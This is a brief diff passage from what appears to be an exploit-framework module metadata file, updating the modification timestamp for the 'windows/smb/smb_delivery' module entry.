"windows/local/wmi", @@ -122100,7 +122100,7 @@ "DLL", "PSH" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2019-03-29 18:14:56 +0000", "path": "/modules/exploits/windows/smb/smb_delivery.rb", "is_install_path": true, "ref_name": "windows/smb/smb_delivery",